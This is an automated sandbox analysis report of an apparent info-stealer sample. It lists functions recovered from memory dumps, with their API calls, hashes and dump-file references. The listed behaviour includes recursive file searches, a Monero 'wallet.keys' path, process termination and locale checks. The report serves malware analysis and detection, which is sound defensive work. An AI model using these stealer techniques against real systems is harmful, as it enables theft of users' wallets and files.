                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 0c1d3d2e08f2733126dfffe84649cd00038a7b80cff2685479e464bc9af36e68
                                    • Instruction ID: 341a45cd9820c145d554aee032fe596190c694c91e00104770d2bf17e4ce01f8
                                    • Opcode Fuzzy Hash: 0c1d3d2e08f2733126dfffe84649cd00038a7b80cff2685479e464bc9af36e68
                                    • Instruction Fuzzy Hash: D2F1CC719141589ACB25FB71CDA5EEEB3BDAF24300F4145EAA10A62191EF307B89CF61
                                    Function 00BDDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BF15A8,00BF0BAF), ref: 00BDDBEB
                                    • StrCmpCA.SHLWAPI(?,00BF15AC), ref: 00BDDC33
                                    • StrCmpCA.SHLWAPI(?,00BF15B0), ref: 00BDDC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDDECC
                                    • FindClose.KERNEL32(000000FF), ref: 00BDDEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 8a96bfae83905e1f36ce64bb87c90135e7de742c0c4f800746e927b8b9b5b0e3
                                    • Instruction ID: 96e7f1ebc39461d40fa96e52912609730f31501df8f29aa93a5b529f948e11f3
                                    • Opcode Fuzzy Hash: 8a96bfae83905e1f36ce64bb87c90135e7de742c0c4f800746e927b8b9b5b0e3
                                    • Instruction Fuzzy Hash: 15915372A002049BCB14FB75ED96AED77BDAF94300F0146E9B94656191FF34AB0CCB92
                                    Function 00BE98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE9905
                                    • Process32First.KERNEL32(00BD9FDE,00000128), ref: 00BE9919
                                    • Process32Next.KERNEL32(00BD9FDE,00000128), ref: 00BE992E
                                    • StrCmpCA.SHLWAPI(?,00BD9FDE), ref: 00BE9943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BE995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BE997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE9987
                                    • CloseHandle.KERNEL32(00BD9FDE), ref: 00BE9993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 89f295782d04830964b40ba4b0efb730d97d1647615face9428671b501985a85
                                    • Instruction ID: 0d1cde865e0cbcac448fe4699db7bfb391978dbecac091eeb08d0dd530988b29
                                    • Opcode Fuzzy Hash: 89f295782d04830964b40ba4b0efb730d97d1647615face9428671b501985a85
                                    • Instruction Fuzzy Hash: 3A11EFB5A04218AFDB24DFA6DC48BDDB7B9AB49701F0045CCF545B6250D774AA88CFA0
                                    Function 00BE7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00BF05B7), ref: 00BE7D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BE7D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BE7D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BE7DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00BE7EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 27e37224c4a43026ee693a2cd1d299f92b48bccb9551d260b558ac6100805f90
                                    • Instruction ID: 5d6528ad66ace3776b864daa88e560efb109abe311105fb6cb78ae77313c25fc
                                    • Opcode Fuzzy Hash: 27e37224c4a43026ee693a2cd1d299f92b48bccb9551d260b558ac6100805f90
                                    • Instruction Fuzzy Hash: F1416271940258AFCB24DBA5DC99BEDB7B8FF58700F2041D9E00962291DB742F88CFA1
                                    Function 00BDE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BF0D79), ref: 00BDE5A2
                                    • StrCmpCA.SHLWAPI(?,00BF15F0), ref: 00BDE5F2
                                    • StrCmpCA.SHLWAPI(?,00BF15F4), ref: 00BDE608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: c7cd21fd19482ead417ea5c4ab50a45ffb9e57b76d9f5077616ab87bc6a55461
                                    • Instruction ID: 7aa356a41e13998fa957f065a954d0ded82fa56e17e678b37606eec578595a50
                                    • Opcode Fuzzy Hash: c7cd21fd19482ead417ea5c4ab50a45ffb9e57b76d9f5077616ab87bc6a55461
                                    • Instruction Fuzzy Hash: 2D125E32A101589BCB14FB71DDA6AED73BDAF64300F4149E9B50A66191EF307B48CF52
                                    Function 01037017 Relevance: 9.2, Strings: 6, Instructions: 1674COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :*o$F2{k$J3o~$Xj^$v}$~
                                    • API String ID: 0-142055222
                                    • Opcode ID: 158ee589904bbb08ca7e17e5e9e375c0c952ca67e0ba7548f3dd7cc92c0c1857
                                    • Instruction ID: 402acff686ce10e2b7aa2d1ee5d78ad67884892650273352d97b909e974be954
                                    • Opcode Fuzzy Hash: 158ee589904bbb08ca7e17e5e9e375c0c952ca67e0ba7548f3dd7cc92c0c1857
                                    • Instruction Fuzzy Hash: 9EB207F3A0C2049FE704AE2DDC8567ABBE9EF94220F16493DE6C5C7744EA3598058793
                                    Function 0102E965 Relevance: 9.1, Strings: 6, Instructions: 1612COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: n/$VZ~m$e']f$lU]$zK$7ng
                                    • API String ID: 0-467099331
                                    • Opcode ID: 89ae350f9d437fd614c12e340686c5fb0b05994752c975b79a885d7e34d89eac
                                    • Instruction ID: c10af32d7d9ffeb185391fd94b3c35aada90476e4dc98e6d0737086d0246c7c0
                                    • Opcode Fuzzy Hash: 89ae350f9d437fd614c12e340686c5fb0b05994752c975b79a885d7e34d89eac
                                    • Instruction Fuzzy Hash: B8B207F3A082149FE704AE2DDC8567AFBE9EF94720F1A453DEAC4C3744EA3558058792
                                    Function 0103F618 Relevance: 7.8, Strings: 5, Instructions: 1560COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6"_/$7\p8$QNM$UFB$xq
                                    • API String ID: 0-2202299890
                                    • Opcode ID: f0df664f588171b9bef0b5ab6cf1cdd491fb79fdbe28e15402128b1c7ca5eaed
                                    • Instruction ID: 6534f5d8efec59af477cf717f730f04de4ffde79053e13ed2f2ad69f3acaa413
                                    • Opcode Fuzzy Hash: f0df664f588171b9bef0b5ab6cf1cdd491fb79fdbe28e15402128b1c7ca5eaed
                                    • Instruction Fuzzy Hash: A7B2E2F36082009FE304AE2DEC8577ABBE5EF94720F1A493DEAC4C7744E63598458796
                                    Function 01035796 Relevance: 7.7, Strings: 5, Instructions: 1447COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'y]$0?$R$e=an$9V
                                    • API String ID: 0-2018199918
                                    • Opcode ID: 9bcb79ef671cd3ad53918ef1175173af4ca3d2242bd97606b40a4531bd57f313
                                    • Instruction ID: ad11a54f860dcd6a1f6755f86381863a679ca924cb9dd95e8379f78a046ce2f4
                                    • Opcode Fuzzy Hash: 9bcb79ef671cd3ad53918ef1175173af4ca3d2242bd97606b40a4531bd57f313
                                    • Instruction Fuzzy Hash: F69218F3A0C2049FE304AE2DEC8577ABBE9EF94760F1A453DE6C4C3744E93598058696
                                    Function 00C3F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 7ef5782549138843efd792637d1ac7f0242673105180e72ccff93b08692e09c8
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: D6417E12E19BD9C5CB058B7444A02AEBFB22FE6210F6D42AEC4DD1F3C2C774424AD3A5
